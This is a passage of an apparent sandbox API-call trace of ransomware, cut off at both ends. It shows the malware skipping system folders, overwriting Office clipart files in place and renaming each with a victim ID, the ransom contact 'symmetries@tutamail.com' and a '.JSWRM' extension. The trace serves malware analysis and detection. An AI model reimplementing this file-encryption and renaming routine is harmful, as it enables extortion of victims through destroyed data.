(lpString1="NA02124_.WMF", lpString2="recovery") returned -1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="perflogs") returned -1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="documents and settings") returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="system volume information") returned -1 [0092.388] lstrcmpiW (lpString1="NA02124_.WMF", lpString2="msocache") returned 1 [0092.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0092.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02124_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02124_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02124_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0092.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02124_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02124_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02124_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0092.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.389] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8168) returned 1 [0092.389] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fe0) returned 0x205850 [0092.389] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1fe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1fe0, lpOverlapped=0x0) returned 1 [0092.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.391] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1fe0, lpOverlapped=0x0) returned 1 [0092.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.392] CloseHandle (hObject=0x314) returned 1 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0092.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0092.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0092.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02124_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02124_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.393] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf643165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf643165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf643165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4816, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02125_.WMF", cAlternateFileName="")) returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2=".") returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="..") returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="...") returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="windows") returned -1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="recovery") returned -1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="perflogs") returned -1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="documents and settings") returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="system volume information") returned -1 [0092.393] lstrcmpiW (lpString1="NA02125_.WMF", lpString2="msocache") returned 1 [0092.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0092.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02125_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02125_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02125_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0092.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02125_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02125_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02125_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.394] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18454) returned 1 [0092.394] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4810) returned 0x24d210 [0092.394] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4810, lpOverlapped=0x0) returned 1 [0092.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.397] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4810, lpOverlapped=0x0) returned 1 [0092.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.397] CloseHandle (hObject=0x314) returned 1 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0092.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.397] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02125_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02125_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.398] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c50, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02126_.WMF", cAlternateFileName="")) returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2=".") returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="..") returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="...") returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="windows") returned -1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="recovery") returned -1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="perflogs") returned -1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="documents and settings") returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="system volume information") returned -1 [0092.398] lstrcmpiW (lpString1="NA02126_.WMF", lpString2="msocache") returned 1 [0092.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02126_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02126_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02126_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02126_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0092.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.400] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31824) returned 1 [0092.400] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c50) returned 0x24d210 [0092.400] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c50, lpOverlapped=0x0) returned 1 [0092.403] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.403] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c50, lpOverlapped=0x0) returned 1 [0092.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.404] CloseHandle (hObject=0x314) returned 1 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0092.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.404] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.404] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.405] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02126_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02126_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.405] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfe4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02127_.WMF", cAlternateFileName="")) returned 1 [0092.405] lstrcmpiW (lpString1="NA02127_.WMF", lpString2=".") returned 1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="..") returned 1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="...") returned 1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="windows") returned -1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="recovery") returned -1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="perflogs") returned -1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="documents and settings") returned 1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="system volume information") returned -1 [0092.406] lstrcmpiW (lpString1="NA02127_.WMF", lpString2="msocache") returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02127_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02127_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02127_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02127_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02127_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02127_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.406] HeapFree (in: 